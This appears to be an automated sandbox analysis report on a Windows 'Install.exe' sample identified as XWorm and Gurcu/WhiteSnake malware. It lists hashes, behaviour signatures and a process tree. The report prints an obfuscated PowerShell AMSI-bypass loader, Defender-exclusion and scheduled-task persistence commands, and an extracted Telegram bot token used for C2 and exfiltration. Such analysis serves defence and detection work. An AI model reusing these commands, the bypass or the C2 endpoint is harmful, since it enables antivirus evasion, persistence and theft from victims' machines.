Analysis

  • max time kernel
    330s
  • max time network
    313s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
  • submitted
    14-12-2024 11:58

General

  • Target

    Install.exe

  • Size

    259KB

  • MD5

    28db4677dcbbaa0a4c5adbc02c9da4f3

  • SHA1

    e1f0199ed131a90e25204399e4e876da64ea3ba5

  • SHA256

    b871ed20d46a9be3a4aedb5facad152ab24289b6866076cb7ffc59721ca7525c

  • SHA512

    718ad88f930160a83c59d9f73d41cf4ea76de3c929956bffb618631d6450b7f59d4b2eb62afa59eff29461b256c402d387df9fdadee9a1a9d1b5e65cea45de52

  • SSDEEP

    6144:ByHp/aGMFlSShM00Iyew/2xrvhwCS9KSyiIBov:IJ/pFJIyN/2RbhHiIS

Malware Config

Extracted

Family

xworm

Attributes
  • Install_directory

    %ProgramData%

  • install_file

    ntoskrnl.exe

  • pastebin_url

    https://pastebin.com/raw/Zx6DUkf9

  • telegram

    https://api.telegram.org/bot6521061783:AAG8RBSc5RacffL-i60qrqMJYo0j7RajlZI/sendMessage?chat_id=5999137434

Extracted

Family

gurcu

C2

https://api.telegram.org/bot6521061783:AAG8RBSc5RacffL-i60qrqMJYo0j7RajlZI/sendMessage?chat_id=5999137434

Signatures

  • Detect Xworm Payload 2 IoCs
  • Gurcu family
  • Gurcu, WhiteSnake

    Gurcu aka WhiteSnake is a malware stealer written in C#.

  • Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
  • Xworm

    Xworm is a remote access trojan written in C#.

  • Xworm family
  • Command and Scripting Interpreter: PowerShell 1 TTPs 5 IoCs

    Using powershell.exe command.

  • Sets service image path in registry 2 TTPs 1 IoCs
  • Checks BIOS information in registry 2 TTPs 2 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Checks computer location settings 2 TTPs 2 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Drops startup file 2 IoCs
  • Executes dropped EXE 2 IoCs
  • Indicator Removal: Clear Windows Event Logs 1 TTPs 1 IoCs

    Clear Windows Event Logs to hide the activity of an intrusion.

  • Adds Run key to start application 2 TTPs 1 IoCs
  • Enumerates connected drives 3 TTPs 23 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Writes to the Master Boot Record (MBR) 1 TTPs 1 IoCs

    Bootkits write to the MBR to gain persistence at a level below the operating system.

  • Drops file in System32 directory 17 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Drops file in Windows directory 6 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 1 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Checks SCSI registry key(s) 3 TTPs 18 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Checks processor information in registry 2 TTPs 19 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Delays execution with timeout.exe 1 IoCs
  • Enumerates system info in registry 2 TTPs 7 IoCs
  • Modifies data under HKEY_USERS 64 IoCs
  • Modifies registry class 1 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of UnmapMainImage 2 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes

  • C:\Windows\system32\winlogon.exe
    winlogon.exe
    1⤵
      PID:620
      • C:\Windows\system32\dwm.exe
        "dwm.exe"
        2⤵
          PID:316
        • C:\Windows\System32\dllhost.exe
          C:\Windows\System32\dllhost.exe /Processid:{ee348cb5-2aac-4565-829d-63c20d7be301}
          2⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:4444
      • C:\Windows\system32\lsass.exe
        C:\Windows\system32\lsass.exe
        1⤵
        • Drops file in System32 directory
        PID:688
      • C:\Windows\system32\svchost.exe
        C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM
        1⤵
          PID:964
        • C:\Windows\system32\svchost.exe
          C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc
          1⤵
            PID:748
          • C:\Windows\System32\svchost.exe
            C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts
            1⤵
              PID:1040
            • C:\Windows\system32\svchost.exe
              C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule
              1⤵
              • Drops file in System32 directory
              PID:1112
              • C:\Windows\system32\taskhostw.exe
                taskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}
                2⤵
                  PID:1068
                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
                  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:AZkhxvoKTiTM{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$wiJlxgesUgLdDw,[Parameter(Position=1)][Type]$chCsNdpolU)$ASCFUUEOAnm=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+[Char](82)+''+[Char](101)+'f'+'l'+''+'e'+'c'+[Char](116)+''+[Char](101)+''+[Char](100)+''+[Char](68)+''+[Char](101)+''+[Char](108)+''+[Char](101)+'g'+[Char](97)+''+'t'+'e')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('I'+[Char](110)+''+[Char](77)+''+[Char](101)+'m'+'o'+'ryMo'+'d'+'u'+[Char](108)+''+'e'+'',$False).DefineType(''+[Char](77)+''+[Char](121)+'Dele'+'g'+''+[Char](97)+''+'t'+''+'e'+'T'+[Char](121)+''+[Char](112)+''+[Char](101)+'',''+[Char](67)+''+[Char](108)+''+[Char](97)+''+[Char](115)+''+'s'+','+[Char](80)+'u'+[Char](98)+'li'+[Char](99)+''+[Char](44)+''+'S'+''+[Char](101)+''+[Char](97)+''+[Char](108)+''+'e'+''+'d'+''+[Char](44)+'A'+[Char](110)+''+[Char](115)+''+[Char](105)+'C'+[Char](108)+''+'a'+''+[Char](115)+''+'s'+',A'+[Char](117)+'t'+[Char](111)+''+'C'+''+[Char](108)+''+[Char](97)+''+[Char](115)+''+[Char](115)+'',[MulticastDelegate]);$ASCFUUEOAnm.DefineConstructor(''+'R'+''+[Char](84)+''+[Char](83)+''+'p'+''+'e'+'ci'+[Char](97)+''+[Char](108)+''+'N'+''+'a'+''+[Char](109)+'e,'+[Char](72)+''+[Char](105)+''+[Char](100)+'e'+[Char](66)+''+[Char](121)+''+[Char](83)+''+[Char](105)+''+[Char](103)+','+'P'+''+[Char](117)+'b'+'l'+''+[Char](105)+''+[Char](99)+'',[Reflection.CallingConventions]::Standard,$wiJlxgesUgLdDw).SetImplementationFlags('R'+'u'+''+[Char](110)+''+[Char](116)+''+[Char](105)+''+'m'+''+[Char](101)+''+[Char](44)+''+[Char](77)+''+'a'+''+[Char](110)+''+[Char](97)+'ged');$ASCFUUEOAnm.DefineMethod(''+[Char](73)+''+[Char](110)+''+'v'+''+[Char](111)+''+[Char](107)+''+'e'+'',''+'P'+''+'u'+'bl'+'i'+'c,'+[Char](72)+''+[Char](105)+''+'d'+''+[Char](101)+''+[Char](66)+''+[Char](121)+''+[Char](83)+'i'+[Char](103)+''+[Char](44)+''+[Char](78)+''+[Char](101)+''+[Char](119)+'S'+[Char](108)+''+[Char](111)+'t'+[Char](44)+''+'V'+''+[Char](105)+''+[Char](114)+''+[Char](116)+''+'u'+'a'+[Char](108)+'',$chCsNdpolU,$wiJlxgesUgLdDw).SetImplementationFlags(''+'R'+''+[Char](117)+''+[Char](110)+''+[Char](116)+''+'i'+''+[Char](109)+''+[Char](101)+''+[Char](44)+''+'M'+''+[Char](97)+''+'n'+''+[Char](97)+'g'+[Char](101)+''+[Char](100)+'');Write-Output $ASCFUUEOAnm.CreateType();}$wuzEQSRsRamkB=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+[Char](83)+''+[Char](121)+''+[Char](115)+''+'t'+''+'e'+''+'m'+''+[Char](46)+''+[Char](100)+'l'+[Char](108)+'')}).GetType(''+[Char](77)+''+[Char](105)+''+[Char](99)+''+[Char](114)+''+[Char](111)+''+'s'+''+[Char](111)+''+'f'+''+[Char](116)+'.W'+[Char](105)+''+[Char](110)+''+[Char](51)+''+[Char](50)+'.'+[Char](85)+''+[Char](110)+''+[Char](115)+''+[Char](97)+''+[Char](102)+''+[Char](101)+''+[Char](78)+''+[Char](97)+''+[Char](116)+''+'i'+''+'v'+''+[Char](101)+'M'+[Char](101)+''+[Char](116)+''+'h'+''+[Char](111)+'ds');$zmPXRqLIswjBKi=$wuzEQSRsRamkB.GetMethod('G'+[Char](101)+''+[Char](116)+''+[Char](80)+'r'+[Char](111)+''+'c'+''+'A'+''+'d'+''+[Char](100)+''+'r'+''+[Char](101)+''+[Char](115)+'s',[Reflection.BindingFlags](''+'P'+'ubl'+[Char](105)+''+[Char](99)+''+[Char](44)+''+'S'+'t'+[Char](97)+''+[Char](116)+''+'i'+''+[Char](99)+''),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$TFmtUEEoiJMPlhggzBD=AZkhxvoKTiTM @([String])([IntPtr]);$CHXkuFacNVAmQHayZWffxp=AZkhxvoKTiTM @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$CTPhHjmmydI=$wuzEQSRsRamkB.GetMethod(''+'G'+''+'e'+''+'t'+'Mo'+[Char](100)+''+'u'+''+'l'+''+[Char](101)+''+'H'+''+[Char](97)+'n'+'d'+''+[Char](108)+''+[Char](101)+'').Invoke($Null,@([Object](''+[Char](107)+''+[Char](101)+''+[Char](114)+''+'n'+''+'e'+'l'+[Char](51)+''+[Char](50)+'.'+[Char](100)+''+[Char](108)+''+[Char](108)+'')));$eGqKxSuRsjOJhk=$zmPXRqLIswjBKi.Invoke($Null,@([Object]$CTPhHjmmydI,[Object](''+[Char](76)+''+[Char](111)+''+'a'+'d'+[Char](76)+''+'i'+''+'b'+''+[Char](114)+'a'+[Char](114)+''+[Char](121)+''+[Char](65)+'')));$FbhqeHNehPIdFSNiO=$zmPXRqLIswjBKi.Invoke($Null,@([Object]$CTPhHjmmydI,[Object](''+[Char](86)+''+[Char](105)+''+'r'+'t'+[Char](117)+''+[Char](97)+'lPr'+[Char](111)+''+[Char](116)+''+'e'+''+[Char](99)+'t')));$dOyVrTA=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($eGqKxSuRsjOJhk,$TFmtUEEoiJMPlhggzBD).Invoke(''+[Char](97)+''+[Char](109)+''+[Char](115)+''+'i'+''+[Char](46)+''+[Char](100)+''+'l'+''+[Char](108)+'');$pUBsjugUTiMYQWCSh=$zmPXRqLIswjBKi.Invoke($Null,@([Object]$dOyVrTA,[Object](''+[Char](65)+''+[Char](109)+''+[Char](115)+''+'i'+''+[Char](83)+''+[Char](99)+''+[Char](97)+'nB'+'u'+''+[Char](102)+''+'f'+''+[Char](101)+''+[Char](114)+'')));$IKIkVymkZO=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($FbhqeHNehPIdFSNiO,$CHXkuFacNVAmQHayZWffxp).Invoke($pUBsjugUTiMYQWCSh,[uint32]8,4,[ref]$IKIkVymkZO);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$pUBsjugUTiMYQWCSh,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($FbhqeHNehPIdFSNiO,$CHXkuFacNVAmQHayZWffxp).Invoke($pUBsjugUTiMYQWCSh,[uint32]8,0x20,[ref]$IKIkVymkZO);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+[Char](83)+''+[Char](79)+'FTWA'+[Char](82)+'E').GetValue(''+[Char](36)+''+'7'+''+'7'+''+[Char](115)+''+'t'+''+'a'+''+[Char](103)+''+'e'+''+'r'+'')).EntryPoint.Invoke($Null,$Null)"
                  2⤵
                  • Suspicious use of NtCreateUserProcessOtherParentProcess
                  • Command and Scripting Interpreter: PowerShell
                  • Drops file in System32 directory
                  • Suspicious use of SetThreadContext
                  • Modifies data under HKEY_USERS
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of AdjustPrivilegeToken
                  • Suspicious use of WriteProcessMemory
                  PID:2304
              • C:\Windows\System32\svchost.exe
                C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
                1⤵
                  PID:1140
                • C:\Windows\system32\svchost.exe
                  C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc
                  1⤵
                    PID:1156
                  • C:\Windows\system32\svchost.exe
                    C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc
                    1⤵
                      PID:1212
                    • C:\Windows\System32\svchost.exe
                      C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog
                      1⤵
                      • Indicator Removal: Clear Windows Event Logs
                      PID:1236
                    • C:\Windows\system32\svchost.exe
                      C:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc
                      1⤵
                        PID:1300
                      • C:\Windows\system32\svchost.exe
                        C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager
                        1⤵
                          PID:1392
                          • C:\Windows\system32\sihost.exe
                            sihost.exe
                            2⤵
                            • Modifies registry class
                            PID:2988
                        • C:\Windows\system32\svchost.exe
                          C:\Windows\system32\svchost.exe -k LocalService -p -s nsi
                          1⤵
                            PID:1408
                          • C:\Windows\system32\svchost.exe
                            C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp
                            1⤵
                              PID:1516
                            • C:\Windows\system32\svchost.exe
                              C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem
                              1⤵
                                PID:1524
                              • C:\Windows\System32\svchost.exe
                                C:\Windows\System32\svchost.exe -k netsvcs -p -s Themes
                                1⤵
                                  PID:1540
                                • C:\Windows\system32\svchost.exe
                                  C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS
                                  1⤵
                                    PID:1660
                                  • C:\Windows\System32\svchost.exe
                                    C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder
                                    1⤵
                                      PID:1704
                                    • C:\Windows\System32\svchost.exe
                                      C:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc
                                      1⤵
                                        PID:1716
                                      • C:\Windows\System32\svchost.exe
                                        C:\Windows\System32\svchost.exe -k LocalService -p -s netprofm
                                        1⤵
                                          PID:1808
                                        • C:\Windows\System32\svchost.exe
                                          C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
                                          1⤵
                                            PID:1816
                                          • C:\Windows\system32\svchost.exe
                                            C:\Windows\system32\svchost.exe -k NetworkService -p -s Dnscache
                                            1⤵
                                              PID:1924
                                            • C:\Windows\System32\svchost.exe
                                              C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
                                              1⤵
                                                PID:1940
                                              • C:\Windows\system32\svchost.exe
                                                C:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository
                                                1⤵
                                                  PID:1996
                                                • C:\Windows\System32\svchost.exe
                                                  C:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection
                                                  1⤵
                                                    PID:2008
                                                  • C:\Windows\System32\spoolsv.exe
                                                    C:\Windows\System32\spoolsv.exe
                                                    1⤵
                                                      PID:1888
                                                    • C:\Windows\System32\svchost.exe
                                                      C:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation
                                                      1⤵
                                                        PID:2152
                                                      • C:\Windows\system32\svchost.exe
                                                        C:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt
                                                        1⤵
                                                        • Suspicious use of AdjustPrivilegeToken
                                                        PID:2196
                                                      • C:\Windows\System32\svchost.exe
                                                        C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc
                                                        1⤵
                                                          PID:2256
                                                        • C:\Windows\system32\svchost.exe
                                                          C:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT
                                                          1⤵
                                                            PID:2420
                                                          • C:\Windows\system32\svchost.exe
                                                            C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent
                                                            1⤵
                                                              PID:2428
                                                            • C:\Windows\system32\svchost.exe
                                                              C:\Windows\system32\svchost.exe -k NetworkService -p -s CryptSvc
                                                              1⤵
                                                              • Drops file in System32 directory
                                                              PID:2568
                                                            • C:\Windows\system32\svchost.exe
                                                              C:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer
                                                              1⤵
                                                              • Enumerates connected drives
                                                              PID:2612
                                                            • C:\Windows\sysmon.exe
                                                              C:\Windows\sysmon.exe
                                                              1⤵
                                                                PID:2644
                                                              • C:\Windows\System32\svchost.exe
                                                                C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks
                                                                1⤵
                                                                  PID:2656
                                                                • C:\Windows\system32\svchost.exe
                                                                  C:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService
                                                                  1⤵
                                                                    PID:2668
                                                                  • C:\Windows\system32\wbem\unsecapp.exe
                                                                    C:\Windows\system32\wbem\unsecapp.exe -Embedding
                                                                    1⤵
                                                                      PID:2964
                                                                    • C:\Windows\system32\svchost.exe
                                                                      C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc
                                                                      1⤵
                                                                        PID:3036
                                                                      • C:\Windows\system32\svchost.exe
                                                                        C:\Windows\system32\svchost.exe -k netsvcs -p -s TokenBroker
                                                                        1⤵
                                                                          PID:3088
                                                                        • C:\Windows\system32\svchost.exe
                                                                          C:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc
                                                                          1⤵
                                                                            PID:3412
                                                                          • C:\Windows\Explorer.EXE
                                                                            C:\Windows\Explorer.EXE
                                                                            1⤵
                                                                            • Suspicious use of UnmapMainImage
                                                                            PID:3492
                                                                            • C:\Users\Admin\AppData\Local\Temp\Install.exe
                                                                              "C:\Users\Admin\AppData\Local\Temp\Install.exe"
                                                                              2⤵
                                                                              • Checks computer location settings
                                                                              • Suspicious use of WriteProcessMemory
                                                                              PID:4504
                                                                              • C:\ProgramData\Install.exe
                                                                                "C:\ProgramData\Install.exe"
                                                                                3⤵
                                                                                • Executes dropped EXE
                                                                                • System Location Discovery: System Language Discovery
                                                                                PID:972
                                                                              • C:\ProgramData\KrnlSetupSus.exe
                                                                                "C:\ProgramData\KrnlSetupSus.exe"
                                                                                3⤵
                                                                                • Checks computer location settings
                                                                                • Drops startup file
                                                                                • Executes dropped EXE
                                                                                • Adds Run key to start application
                                                                                • Suspicious use of AdjustPrivilegeToken
                                                                                • Suspicious use of SetWindowsHookEx
                                                                                PID:3488
                                                                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\ProgramData\KrnlSetupSus.exe'
                                                                                  4⤵
                                                                                  • Command and Scripting Interpreter: PowerShell
                                                                                  • Suspicious behavior: EnumeratesProcesses
                                                                                  PID:3244
                                                                                  • C:\Windows\System32\Conhost.exe
                                                                                    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                    5⤵
                                                                                      PID:4840
                                                                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'KrnlSetupSus.exe'
                                                                                    4⤵
                                                                                    • Command and Scripting Interpreter: PowerShell
                                                                                    • Suspicious behavior: EnumeratesProcesses
                                                                                    PID:3320
                                                                                    • C:\Windows\System32\Conhost.exe
                                                                                      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                      5⤵
                                                                                        PID:4900
                                                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\ProgramData\ntoskrnl.exe'
                                                                                      4⤵
                                                                                      • Command and Scripting Interpreter: PowerShell
                                                                                      PID:916
                                                                                      • C:\Windows\System32\Conhost.exe
                                                                                        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                        5⤵
                                                                                          PID:1840
                                                                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'ntoskrnl.exe'
                                                                                        4⤵
                                                                                        • Command and Scripting Interpreter: PowerShell
                                                                                        PID:4292
                                                                                        • C:\Windows\System32\Conhost.exe
                                                                                          \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                          5⤵
                                                                                            PID:3168
                                                                                        • C:\Windows\System32\schtasks.exe
                                                                                          "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "ntoskrnl" /tr "C:\ProgramData\ntoskrnl.exe"
                                                                                          4⤵
                                                                                          • Scheduled Task/Job: Scheduled Task
                                                                                          PID:976
                                                                                          • C:\Windows\System32\Conhost.exe
                                                                                            \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                            5⤵
                                                                                              PID:3736
                                                                                            • C:\Windows\system32\WerFault.exe
                                                                                              C:\Windows\system32\WerFault.exe -u -p 976 -s 304
                                                                                              5⤵
                                                                                              • Checks processor information in registry
                                                                                              • Enumerates system info in registry
                                                                                              PID:3992
                                                                                          • C:\Windows\System32\schtasks.exe
                                                                                            "C:\Windows\System32\schtasks.exe" /delete /f /tn "ntoskrnl"
                                                                                            4⤵
                                                                                              PID:976
                                                                                              • C:\Windows\System32\Conhost.exe
                                                                                                \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                5⤵
                                                                                                  PID:4008
                                                                                              • C:\Windows\system32\cmd.exe
                                                                                                C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmpF57C.tmp.bat""
                                                                                                4⤵
                                                                                                  PID:1564
                                                                                                  • C:\Windows\System32\Conhost.exe
                                                                                                    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                    5⤵
                                                                                                      PID:2280
                                                                                                    • C:\Windows\system32\timeout.exe
                                                                                                      timeout 3
                                                                                                      5⤵
                                                                                                      • Delays execution with timeout.exe
                                                                                                      PID:3600
                                                                                            • C:\Windows\system32\svchost.exe
                                                                                              C:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc
                                                                                              1⤵
                                                                                                PID:3616
                                                                                              • C:\Windows\system32\DllHost.exe
                                                                                                C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
                                                                                                1⤵
                                                                                                  PID:3816
                                                                                                • C:\Windows\System32\RuntimeBroker.exe
                                                                                                  C:\Windows\System32\RuntimeBroker.exe -Embedding
                                                                                                  1⤵
                                                                                                    PID:3976
                                                                                                  • C:\Windows\System32\RuntimeBroker.exe
                                                                                                    C:\Windows\System32\RuntimeBroker.exe -Embedding
                                                                                                    1⤵
                                                                                                    • Suspicious use of UnmapMainImage
                                                                                                    PID:4156
                                                                                                  • C:\Windows\system32\svchost.exe
                                                                                                    C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc
                                                                                                    1⤵
                                                                                                    • Modifies data under HKEY_USERS
                                                                                                    PID:4680
                                                                                                  • C:\Windows\System32\svchost.exe
                                                                                                    C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc
                                                                                                    1⤵
                                                                                                      PID:420
                                                                                                    • C:\Windows\system32\svchost.exe
                                                                                                      C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV
                                                                                                      1⤵
                                                                                                        PID:1444
                                                                                                      • C:\Windows\system32\svchost.exe
                                                                                                        C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc
                                                                                                        1⤵
                                                                                                          PID:684
                                                                                                        • C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe
                                                                                                          "C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service
                                                                                                          1⤵
                                                                                                          • Drops file in System32 directory
                                                                                                          • Modifies data under HKEY_USERS
                                                                                                          PID:2776
                                                                                                        • C:\Windows\system32\SppExtComObj.exe
                                                                                                          C:\Windows\system32\SppExtComObj.exe -Embedding
                                                                                                          1⤵
                                                                                                            PID:4532
                                                                                                          • C:\Windows\System32\svchost.exe
                                                                                                            C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager
                                                                                                            1⤵
                                                                                                              PID:1424
                                                                                                            • C:\Windows\system32\DllHost.exe
                                                                                                              C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
                                                                                                              1⤵
                                                                                                                PID:4968
                                                                                                              • C:\Windows\system32\svchost.exe
                                                                                                                C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s NgcCtnrSvc
                                                                                                                1⤵
                                                                                                                  PID:1432
                                                                                                                • C:\Windows\System32\RuntimeBroker.exe
                                                                                                                  C:\Windows\System32\RuntimeBroker.exe -Embedding
                                                                                                                  1⤵
                                                                                                                    PID:5044
                                                                                                                  • C:\Windows\system32\backgroundTaskHost.exe
                                                                                                                    "C:\Windows\system32\backgroundTaskHost.exe" -ServerName:ShellFeedsUI.AppXnj65k2d1a1rnztt2t2nng5ctmk3e76pn.mca
                                                                                                                    1⤵
                                                                                                                      PID:2812
                                                                                                                    • C:\Windows\system32\wbem\wmiprvse.exe
                                                                                                                      C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                                                                                                                      1⤵
                                                                                                                      • Checks BIOS information in registry
                                                                                                                      • Writes to the Master Boot Record (MBR)
                                                                                                                      • Checks SCSI registry key(s)
                                                                                                                      • Checks processor information in registry
                                                                                                                      • Enumerates system info in registry
                                                                                                                      • Suspicious behavior: EnumeratesProcesses
                                                                                                                      PID:5048
                                                                                                                    • C:\Windows\System32\svchost.exe
                                                                                                                      C:\Windows\System32\svchost.exe -k WerSvcGroup
                                                                                                                      1⤵
                                                                                                                        PID:1532
                                                                                                                      • C:\Windows\System32\WaaSMedicAgent.exe
                                                                                                                        C:\Windows\System32\WaaSMedicAgent.exe da20875ce8e004b03df363f3efd45494 XLMApp32GEe1q/uqtbUcMA.0.1.0.0.0
                                                                                                                        1⤵
                                                                                                                        • Sets service image path in registry
                                                                                                                        • Modifies data under HKEY_USERS
                                                                                                                        PID:2888
                                                                                                                        • C:\Windows\System32\Conhost.exe
                                                                                                                          \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                          2⤵
                                                                                                                            PID:4816
                                                                                                                        • C:\Windows\system32\svchost.exe
                                                                                                                          C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv
                                                                                                                          1⤵
                                                                                                                          • Drops file in Windows directory
                                                                                                                          PID:1244
                                                                                                                        • C:\Windows\servicing\TrustedInstaller.exe
                                                                                                                          C:\Windows\servicing\TrustedInstaller.exe
                                                                                                                          1⤵
                                                                                                                            PID:4184
                                                                                                                          • C:\Windows\system32\svchost.exe
                                                                                                                            C:\Windows\system32\svchost.exe -k netsvcs -p -s UsoSvc
                                                                                                                            1⤵
                                                                                                                              PID:4672
                                                                                                                            • C:\Windows\System32\mousocoreworker.exe
                                                                                                                              C:\Windows\System32\mousocoreworker.exe -Embedding
                                                                                                                              1⤵
                                                                                                                              • Checks processor information in registry
                                                                                                                              • Enumerates system info in registry
                                                                                                                              • Modifies data under HKEY_USERS
                                                                                                                              PID:3120
                                                                                                                            • C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.1220_none_7e21bc567c7ed16b\TiWorker.exe
                                                                                                                              C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.1220_none_7e21bc567c7ed16b\TiWorker.exe -Embedding
                                                                                                                              1⤵
                                                                                                                                PID:3532
                                                                                                                              • C:\Windows\System32\mousocoreworker.exe
                                                                                                                                C:\Windows\System32\mousocoreworker.exe -Embedding
                                                                                                                                1⤵
                                                                                                                                • Checks processor information in registry
                                                                                                                                • Enumerates system info in registry
                                                                                                                                PID:4544

                                                                                                                              Network

                                                                                                                              MITRE ATT&CK Enterprise v15

                                                                                                                              Replay Monitor

                                                                                                                              Loading Replay Monitor...

                                                                                                                              Downloads

                                                                                                                              • C:\ProgramData\Install.exe

                                                                                                                                Filesize

                                                                                                                                162KB

                                                                                                                                MD5

                                                                                                                                b5f6c9ac3389f5e61b4c750cf950e27c

                                                                                                                                SHA1

                                                                                                                                dbe0cca47ab36938ed022311f97736fc2915ff06

                                                                                                                                SHA256

                                                                                                                                bd4062e261a7ac5893e95a88d79564b44aad58ca446c3649a50589415b64d098

